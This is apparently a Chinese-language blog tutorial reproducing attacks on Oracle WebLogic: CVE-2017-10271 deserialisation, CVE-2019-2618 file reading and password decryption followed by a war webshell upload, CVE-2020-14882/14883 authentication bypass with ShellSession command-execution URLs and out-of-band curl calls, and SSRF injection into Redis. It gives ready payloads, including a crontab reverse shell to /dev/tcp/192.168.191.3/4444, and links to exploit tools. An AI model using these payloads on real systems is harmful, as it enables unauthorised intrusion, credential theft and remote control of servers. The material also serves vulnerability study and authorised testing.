文章来源:Admin Team
weblogic简介
Weblogic是美国Oracle公司出品的一个应用服务器(application server),确切的说是一个基于Java EE架构的中间件,是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器
Weblogic将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中,是商业市场上主要的Java(Java EE)应用服务器软件之一,也是世界上第一个成功商业化的Java EE应用服务器,具有可扩展性、快速开发、灵活、可靠等优势。
在功能性上,Weblogic是Java EE的全能应用服务器,包括EJB 、JSP、servlet、JMS等,是商业软件里排名第一的容器(JSP、servlet、EJB等),并提供其他工具(例如Java编辑器),因此也是一个综合的开发及运行环境。在扩展性上,Weblogic Server凭借其出色的群集技术,拥有处理关键Web应用系统问题所需的性能、可扩展性和高可用性。
漏洞汇总
CVE-2017-10271
漏洞简述
Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。
漏洞影响版本
10.3.6.0.0,12.1.3.0.0,12.2.1.1.0,12.2.1.2.0。
漏洞触发地址
/wls-wsat/CoordinatorPortType /wls-wsat/RegistrationPortTypeRPC /wls-wsat/ParticipantPortType /wls-wsat/RegistrationRequesterPortType /wls-wsat/CoordinatorPortType11 /wls-wsat/RegistrationPortTypeRPC11 /wls-wsat/ParticipantPortType11 /wls-wsat/RegistrationRequesterPortType11
漏洞复现
1.访问触发此漏洞的 ip:7001//wls-wsat/CoordinatorPortType
2.使用burp抓取请求包后发送至repeater模块,将数据包修改成构造好的payload
POST /wls-wsat/CoordinatorPortType HTTP/1.1Host: ip:7001Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: text/xmlContent-Length: 637
成功写入123
3.反弹shell
构造好反弹shell的命令,在vps上使用nc监听4444端口
成功反弹
CVE-2019-2618
漏洞简述
利用任意文件读取来获取weblogic的弱口令登录进入后台,然后通过上传getshell,通过构造任意文件下载漏洞环境读取到后台用户名和密码,然后登陆进后台,上传webshell。
漏洞影响版本
WebLogic 10.3.6.0、12.1.3.0、12.2.1.3
漏洞复现
1.任意文件读取
访问url (http://IP:7001/hello/file.jsp?path=/etc/passwd) , 成功读取到账号和密码
不过只能读取一些文件,如何更深层次利用这个漏洞呢?weblogic密码使用AES(老版本3DES)加密,对称加密可解密,只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下,名为SerializedSystemIni.dat和config.xml。SerializedSystemIni.dat是一个二进制文件,所以一定要用burpsuite来读取,用浏览器直接下载可能引入一些干扰字符。在burp里选中读取到的那一串乱码,这就是密钥,右键copy to file就可以保存成一个文件:
http://yourIp:7001/hello/file.jsp?path=security/SerializedSystemIni.dat
config.xml是base_domain的全局配置文件,所以乱七八糟的内容比较多,找到其中的的值,即为加密后的管理员密码
http://yourIP:7001/hello/file.jsp?path=config/config.xml
下载工具进行解密
(下载地址:https://github.com/TideSec/Decrypt_Weblogic_Password)
使用其中的工具5进行解密
2.后台上传getshell
1.使用解密后的账号密码登录后台,weblogic常见的弱密码
https://cirt.net/passwords?criteria=weblogic 这里使用 用户名:weblogic 密码:Oracle@123 登录
2.进入后台后点击左边的部署,找到可以上传文件的地址
3.生成一个war包
war是一个可以直接运行的web模块,通常用于网站,打成包部署到容器中。war包放置到web目录下之后,可以自动解压,就相当于发布了。简单来说,war包是JavaWeb程序打的包,war包里面包括写的代码编译成的class文件,依赖的包,配置文件,所有的网站页面,包括html,jsp等等。一个war包可以理解为是一个web项目,里面是项目的所有东西
这里使用冰蝎里面自带的jsp一句话生成war马
jar -cvf shell.war shell.jsp
生成war后将war马部署上去
4.使用冰蝎进行连接(默认密码为rebeyond),成功getshell
CVE-2020-14882
漏洞简述
远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console,并在 WebLogic Server Console 执行任意代码。
漏洞影响版本
Oracle Weblogic Server 10.3.6.0.0Oracle Weblogic Server 12.1.3.0.0Oracle Weblogic Server 12.2.1.3.0Oracle Weblogic Server 12.2.1.4.0Oracle Weblogic Server 14.1.1.0.0
CVE-2020-14883:权限绕过漏洞
远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console。权限绕过漏洞(CVE-2020-14883),访问以下URL,未授权访问到管理后台页面(低权限的用户)
/console/images/%252E%252E%252Fconsole.portal/console/css/%252e%252e%252fconsole.portal(小写可绕过补丁)/console/css/%25%32%65%25%32%65%25%32%66console.portal
此时的权限很低,并不能在后台安装应用,所以需要结合CVE-2020-14883漏洞
CVE-2020-14882 : 代码执行漏洞
结合 CVE-2020-14883 漏洞,远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic Server Console 执行任意代码。
该漏洞有两个利用手法
利用 com.tangosol.coherence.mvel2.sh.ShellSession 执行命令利用 com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext 执行命令
1. 利用 com.tangosol.coherence.mvel2.sh.ShellSession 执行命令
DNSLOG的使用
DNSLOG可以在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过这种方式把想获得的数据外带出来。
进入DNSLOG平台 http://www.dnslog.cn/ ,点击GET 获取一个域名,然后使用payload执行命令
http://IP:7001//console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('curl%20xx.dnslog.cn');")
直接访问URL
http://ip:端口/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runtime.getRuntime().exec('touch%20/tmp/success1');")
进入docker容器中可以看到文件以成功创建
这个利用方法只能在Weblogic 12.2.1以上版本利用,因为10版本并不存在 com.tangosol.coherence.mvel2.sh.ShellSession 类
2.利用com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext执行命令
一种更为通杀的方法,对于所有Weblogic版本均有效。但是必须可以出网,要可以访问到恶意的xml。首先需要构造一个XML文件,并将其保存外网(漏洞机或者可访问的一台机子上)上
XML文件:
然后通过构造如下URL,即可让Weblogic加载这个XML,并执行其中的命令:
http://your-ip:7001/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://ip.xml")
getshell
访问页面 (http://ip:7001/console/login/LoginForm.jsp) 使用burp抓包,修改请求包为构造好的payload
也可以直接下载大佬写好的工具,下载地址(https://github.com/backlion/CVE-2020-14882_ALL)
ssrf漏洞
漏洞描述
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。
SSRF漏洞可以通过篡改获取资源的请求发送给服务器,但是服务器并没有检测这个请求是否合法的,然后服务器以他的身份来访问其他服务器的资源。
漏洞影响范围
Oracle WebLogic Server 10.3.6.0
Oracle WebLogic Server 10.0.2.0
redis简介
Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API
它通常被称为数据结构服务器,因为值(value)可以是 字符串(String), 哈希(Hash), 列表(list), 集合(sets) 和 有序集合(sorted sets)等类型。
漏洞复现
浏览器访问存在漏洞的地址 SearchPublicRegistries.jsp
http://192.168.31.187:7001/uddiexplorer/SearchPublicRegistries.jsp
1.使用burp抓包后看到参数operator的参数是一个url,这个就是利用点 ,构造请求,通过改变url的端口来做一个端口检测 ( 通过错误的不同,即可探测内网状态。)
可访问的端口将会得到错误,一般是返回状态码(如下图)
修改为一个不存在的端口,将会返回错误`could not connect over HTTP to server`。
如果访问的非http协议(内网),则会返回`did not have a valid SOAP content-type`。
利用redis反弹shell
weblogic的ssrf有一个比较大的特点,其虽然是一个GET请求,但是我们可以通过传入**%0a%0d**来注入换行符,而某些服务(如redis)是通过换行符来分隔每条命令,也就是说我们可以通过该SSRF攻击内网中的redis服务器。首先通过ssrf探测内网中的redis服务器,通常redis端口为6379
1.首先,通过ssrf探测内网中的redis服务器(docker环境的网段一般是172.*)
2.构造redis反弹shell命令
testset 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.191.3/4444 0>&1\n\n\n\n"config set dir /etc/config set dbfilename crontabsaveaaa
3.绕过拦截
http://ip/test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn%2A%20%2A%20%2A%20%2A%20%2A%20root%20bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F192%2E168%2E191%2E3%2F4444%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa%0A%0A%0D%0A
4.使用nc(windows)监听4444端口
5.将url编码后的payload使用POST请求发送
6.成功反弹shell
7.然后可以进入redis容器中查看定时任务 定时任务存放地址为 /etc/corntab
最后还有一个weblogic一键漏洞扫描检测工具,提供一键poc检测,收录几乎全部weblogic历史漏洞。
下载地址
https://github.com/rabbitmask/WeblogicScan 原版https://github.com/dr0op/WeblogicScan 修改版,多一个CVE检测,高亮美化https://github.com/21superman/weblogic_exploit 21superman写的,漏洞比较全面
使用方法 python3 WeblogicScan.py [ip][port]